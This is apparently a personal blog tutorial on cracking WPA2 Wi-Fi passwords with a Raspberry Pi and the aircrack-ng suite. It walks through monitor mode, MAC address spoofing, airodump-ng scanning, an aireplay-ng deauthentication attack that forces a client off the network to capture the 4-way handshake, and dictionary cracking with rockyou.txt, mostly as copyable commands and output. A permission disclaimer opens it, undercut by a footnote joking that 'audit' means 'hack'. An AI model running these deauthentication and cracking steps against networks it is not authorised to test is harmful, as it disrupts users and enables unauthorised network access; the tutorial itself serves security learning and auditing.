Very Serious Legal Disclaimer
This tutorial is intended for you to test YOUR OWN NETWORK INFRASTRUCTURE AND HARDWARE OR NETWORK INFRASTRUCTURE and hardware you have specific permission to audit1. I am not a lawyer, I am not your lawyer and you really shouldn’t do anything stupid or bad with the information contained in this post.
If you’re just learning to hack, follow this simple principle: do not hack things without permission2:
What you should do is learn this stuff and make your networks, and any network you are responsible for, that much more difficult to pop.
Text Video or Pictures
Depending on what type of learning you prefer it might be easier for you to watch a video of this process, that video is at the end of this post.
This post assumes you have a Raspberry Pi 3B+ (RPi) running the operating system Raspbian Stretch Lite. It’s important to use the light version as it doesn’t contain anything you don’t need. Anything you do need you can install.
You will also need a Wi-Fi adapter that you can put into Monitor Mode, on this version of the RPi it is possible to do that but I would definitely recommend splashing out the 20 to 30 quid on an Alfa USB Wi-Fi radio. I’ve tried loads of them but I always end up coming back to the Alfa AWUS036NHA USB Wi-Fi radio.
Install The Necessary Software
First need to install the software we are going to need to Hack all the packets! The software packages we are going to install our:
- wget & curl For grabbing things from the Internet
- iw For monkeying with network connections
- aircrack-ng For grabbing handshakes and attempting to guess the password
- macchanger To give us a random MAC address
sudo apt install wget and curl
sudo apt install iw
Install Aircrack Suite
sudo apt install aircrack-ng
sudo apt install macchanger
Hunt the Radio!
On the RPi the interface named
wlan03 tends to be the Wi-Fi radio on the RPi itself and whilst it’s possible to use the on-board Wi-Fi in Monitor Mode, you will have much better results (with range and signal strength etc) with the USB Wi-Fi radio. That being said it’s time to find whether the RPi recognises your USB Wi-Fi radio.
Find Your USB Radio
To find out if your radio is connected run the following command in your Terminal:
Which will hopefully output something in the terminal that looks like this:
Bus 001 Device 004: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
If you’re not sure which USB Device is your Wi-Fi radio is which, unplug your USB radio and run the command again. You should be able to see what’s missing.
Is It Can Be Wireless?
We need to check whether your USB radio can be used in a Usefully Wireless Way™. Run the command below to find out:
Test USB Antenna Usefulness
The results of this command should contain something like the following (if they do you are onto a winner):
lsusb Command Output
wlan1 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
Time Spent On Reconnaissance Is Seldom Wasted
airmon-ng is part of the aircrack-ng suite of tools, which we’re going to use to place our wireless interface into the right modes. Let’s see which wireless interfaces
airmon-ng is aware of, and can therefore use, by running:
Check Useful Wi-Fi Interfaces
Which should give you the following output. The one we are going to be acting upon is called: wlan1.
PHY Interface Driver Chipset phy0 wlan0 brcmfmac Broadcom 43430 phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070
For the software to do the things that it does, the antenna needs to be put in a state known as Monitor Mode. We do this by simply issuing the following command: (The command may vary slightly if your Wi-Fi adapter has a different name.)
wlan1into Monitor Mode
airmon-ng start wlan1
This is a pretty typical output from the command above. As you can see a new Monitor Mode network interface has been created called: wlan1mon. Without putting your radio into Monitor Mode, nothing that follows will work.
Airmon-ng start wlan1 Output
PHY Interface Driver Chipset phy0 wlan0 brcmfmac Broadcom 43430 phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070 (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon) (mac80211 station mode vif disabled for [phy1]wlan1)
Now, I know that you’ve got full permission to go after this particular access point so you might wonder why you need to mask your computers identity by changing the mac address. Well, you don’t. But if you intend to start a career in penetration testing, then developing the habit of routinely masking your computers identity and not leaking any personally identifiable information will serve you well. Changing your MAC address is a very basic step that you can take. You can change the MAC address of your computer with macchanger.
Take Down Monitor Mode Interface Temporarily
ifconfig wlan1mon down
Temporarily change your MAC Address
macchanger -p wlan1mon
Will output following command, do not be tempted to set a random MAC address permanently. The reason we are changing the MAC address is to get rid of any permanent identifiers. Get into the habit of doing this each time you run the process.4
Current MAC: 00:25:22:XX:XX:XX (ASRock Incorporation) Permanent MAC: 00:25:22:XX:XX:XX(ASRock Incorporation) New MAC: 00:11:22:XX:XX:XX (CIMSYS Inc)
This brings the Monitor Mode Wi-Fi interface back up so that we can use it for the rest of the tutorial:
Bring Monitor Mode Interface Back Up
ifconfig wlan1mon up
Let’s Get Scanning
Now we get to the good part. Here is a video of the process from installing the software to beginning the scanning process. I would recommend reading the text instructions as well but lots of people find these videos useful:
Airmon-ng & Airodump-ng
Use the following command to do a survey of all of the Wi-Fi access points and clients that are within range of your machine:
NOTE: your monitoring interface may be called something other than wlan1mon. Replace the name of your interface in the commands below where necessary.
Initial Airodump-ng Scan
You will get output looking like this. I have again redacted some of the information to protect the guilty:
Airodump-ng Scan Output
CH 8 ][ Elapsed: 18 s ][ 2019-03-28 22:16 ][ sorting by beacon number BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 2C:FD:A1:XX:XX:XX -45 13 132 14 9 54 WPA2 CCMP PSK Pretty Fly for a Wi-Fi B8:27:EB::XX:XX:XX -38 13 43 0 7 54 WPA2 CCMP PSK PiFi BSSID STATION PWR Rate Lost Frames Probe 2C:FD:A1:XX:XX:XX 40:B4:CD:XX:XX:XX -36 0e-24e 8 58 is acutely 2C:FD:A1:XX:XX:XX D0:73:D5:XX:XX:XX -62 1 -11 0 2 B8:27:EB:XX:XX:XX 00:C0:CA:XX:XX:XX -28 0 -48 0 22 B8:27:EB:XX:XX:XX F0:18:98:XX:XX:XX -70 0 - 5 0
Pick On A Target
Okay, now we need to choose a victim (Or you know, legally allowed client. In this instance it will be my access point called PiFi, and the name of the game is to capture the 4-Way Handshake. This is a cryptographic artefact which is generated each time a device associates with a wireless access point. When your mobile phone or laptop connects to your home Wi-Fi it exchanges information with your Wi-Fi routers and one of those pieces of information is the 4-Way Handshake. Amongst other things, the 4 Way Handshake contains the Wi-Fi password for that access point. It is in a hashed state, but once we have grabbed it out of the ether we can go about cracking it.
When thinking about target selection you are always going to be much better off choosing a wireless access point that has one or more clients connected to it. While technically you could just leave the command running and waiting for somebody to connect your access point of choice, it’s much quicker to choose one has somebody to bump off the network.
TL,DR: We will be running a deauthentication attack.
Picking on the Access Point
airodump-ng -c 7 -w PiFi -b B8:27:EB:XX:XX:XX wlan1mon
airodump-ng = Software to monitor Access Points
-c 7 = The channel of our chosen victim
-w PiFi = The ESSID (name) of our access point
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of our access point
wlan1mon = The name of our Monitor Mode interface
You can see that the
airodump-ng command we just issued is very similar to the first we did, except it is exclusively focusing on one access point. Your Mac addresses and access point name will be different, but your output will look like this:
Specific Access Point airodump-ng Output
CH 7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID B8:27:EB:XX:XX:XX -34 100 186 91 16 7 54 WPA2 CCMP PSK PiFi BSSID STATION PWR Rate Lost Frames Probe B8:27:EB:XX:XX:XX 00:C0:CA:XX:XX:XX -24 0 -48 0 1 B8:27:EB:XX:XX:XX F0:18:98:XX:XX:XX -58 36 -24 83 88
Bump Them Off!
This is very important: you must leave that running and open up a new terminal for the next command. The purpose of this command is to pick on one of the clients connected to PiFi and try and bump them off the network. When they try to reconnect they will be successful, but during the process we can swipe one of the 4-Way Handshakes they exchange with the access point without them knowing! Mwahaha!
Kick Them Off The Access Point
aireplay-ng -0 50 -e PiFi -a B8:27:EB:XX:XX:XX -c 00:1d:d9:XX:XX:XX wlan1mon
aireplay-ng = Software needed for a deauthentication attack
-0 50 =
-0 Indicates we want to carry out a deauthentication attack.
50 is a whole number denoting how many packets we should send. YMMV with how many you would need to achieve the job, I generally use 50 with a fair degree of success.
-e PiFi = The ESSID (name) of our access point
-a B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
-c B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the CLIENT we want to knock off the access point
wlan1mon = The name of our Monitor Mode interface
Now, if you look back in the first terminal window that is monitoring the access point you should see a change if you are successful. In the top right hand corner of the screen you should see the message
[ WPA handshake: B8:27:EB:XX:XX:XX with the MAC address of the access point being shown. This means you now have a file containing a hashed version of the password needed to authenticate with the Wi-Fi access point.
It will probably look something like this:
WPA 4-Way Handshake Captured
CH 7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ][ WPA handshake: B8:27:EB:XX:XX:XX BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 2C:FD:A1:XX:XX:XX -24 0 0 1 0 9 54 WPA2 CCMP PSK The Night's Switch. B8:27:EB:XX:XX:XX -34 100 186 91 16 7 54 WPA2 CCMP PSK PiFi BSSID STATION PWR Rate Lost Frames Probe B8:27:EB:XX:XX:XX 00:C0:CA:XX:XX:XX -24 0 -48 0 1 B8:27:EB:XX:XX:XX F0:18:98:XX:XX:XX -58 36 -24 83 88
The Hard Part
All of this has been leading up to us cracking the hashed password and revealing the plaintext version so that we can authenticate with the access point, there are a number of ways to do that but the most accessible is to use a Dictionary Attack and a piece of software called Aircrack-ng. I will post more about this topic in the future as it totally fascinates me.
For now, here’s a quick example of using the tool to try and crack the password.
We use a dictionary attack which takes a huge list of passwords, hashes them using the same algorithm ashore Wi-Fi access point, and then compares them to the hash we have captured in our forward handshake. If it finds a match then you are successful, however if the password you have captured in the 4-Way Handshake is not contained in the dictionary then you will be out of luck. These dictionary attacks also take a very long time, and the more you do it the better your dictionaries will get but this is by no means a full proof way of getting the password. You are relying upon people’s habit of not using good passwords.
The RockYou List
The rockyou.txt password list is one of the standard dictionary lists of password that appeared out of the mists of time, from who knows when and who knows where… To get your copy of this holy talisman use the following command:
Rock My World
Cracking the Hashed Password
aircrack-ng -w rockyou.txt -b B8:27:EB:XX:XX:XX PiFi-01.cap
aircrack-ng = Software needed to try cracking a password
-w rockyou.txt = This command points of the word list called
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
PiFi-01.cap = The file we captured early containing the 4-Way Handshake
If you managed to capture a hashed password, running the command above will have the following output. Note a gigantic amount of time this takes, obviously more powerful CPU generally equals shorter cracking time. But it doesn’t matter how fast your computer is, if the password is not in your dictionary then you will not crack it.
Aircrack-ng 1.5.2 [00:00:09] 1484/9822769 keys tested (168.84 k/s) Time left: 16 hours, 14 minutes, 20 seconds 0.02% Current passphrase: addicted Master Key : 90 DC DF 8F BA AD 8A 78 88 23 19 51 F0 BC 46 B7 A1 78 2D 0D 5F 4C 2E FE 72 DE BF F3 43 E8 4E A1 Transient Key : D9 78 50 9E FF 4E FE C4 7D 47 10 B9 43 22 6E 10 28 32 4B 37 DF A2 61 85 9A E9 F1 5B 28 62 E3 4A 5D 61 01 9C CE 39 C7 96 AC 1B B2 47 73 24 D0 9A 6D BB 55 A8 B5 B2 3B 11 7D 99 27 14 1B B1 84 ED EAPOL HMAC : C4 91 54 B6 AB 05 CF E7 D8 DF 90 C1 6E 43 56 EC
Yes yes, by audit I obviously mean hack! ↩
Permission from the owner of the hardware, not your mum! (Unless she owns a hardware, natch) ↩
There are some reasons this might not be the case, but you will probably be fine and that is out of scope. ↩
Obviously have changed my personal MAC address to protect the totally not guilty. ↩